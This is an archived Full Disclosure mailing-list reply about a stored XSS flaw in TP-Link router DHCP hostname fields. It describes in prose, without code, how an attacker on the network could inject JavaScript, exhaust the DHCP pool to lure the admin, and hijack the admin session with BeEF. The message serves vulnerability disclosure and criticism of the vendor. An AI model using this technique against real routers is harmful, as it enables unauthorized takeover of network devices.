[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-Id: <EBCAA892-4017-4783-A15F-40D0462A37FE@surevine.com>
Date: Mon, 28 Nov 2016 14:42:57 +0000
From: "Simon Waters (Surevine)" <simon.waters@...evine.com>
To: Vulnerability Lab <research@...nerability-lab.com>
Cc: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>,
support.uk@...link.com
Subject: Re: [FD] Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability
XSS in DHCP name has been reported on the Full Disclosure mailing list for other models of TP-Link Router before.
Seems to be generic to many TP-Link models.
My model has a regular line wrap to the DHCP hostname field, so you need to insert a comment into HTML or JS every N characters into any exploit code, but it is fully exploitable, and you can write arbitrary JS in that space with a little effort.
The attacker would have to inject JavaScript as a DHCP hostname, exhaust the DHCP pool to encourage the admin to view the DHCP page, at which point the attacker would take control of the admin’s browser and current session using a tool such as BeEF XSS.
So anyone who can get a DHCP lease from a TP-Link router can use this to obtain a reasonable chance of acquiring admin privileges on that router.
That TP-Link continue to sell routers with basic security vulnerabilities like these is unimpressive, and there doesn’t seem to be an effective support channel to get these issues fixed, or updates released.
Simon Waters
phone +448454681066
email simon.waters@...evine.com <mailto:simon.waters@...evine.com>
skype simon.waters.surevine <skype://simon.waters.surevine>
Participate | Collaborate | Innovate
Surevine Limited, registered in England and Wales with number 06726289. Mailing Address : PO Box 1136, Guildford GU1 9ND
If you think you have received this message in error, please notify us.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists